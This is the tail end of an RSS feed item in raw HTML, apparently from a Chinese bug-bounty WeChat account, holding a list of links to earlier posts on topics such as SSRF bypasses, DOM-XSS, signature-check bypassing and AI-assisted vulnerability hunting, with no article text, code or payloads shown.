src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><span leaf="">往期回顾</span><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b82a679a&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499336%26idx%3D1%26sn%3D00539fdac4847c0b2dc10bcab240ca20">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 21 Apr 2026 10:00:00 +0800</pubDate>
    </item>
  </channel>
</rss>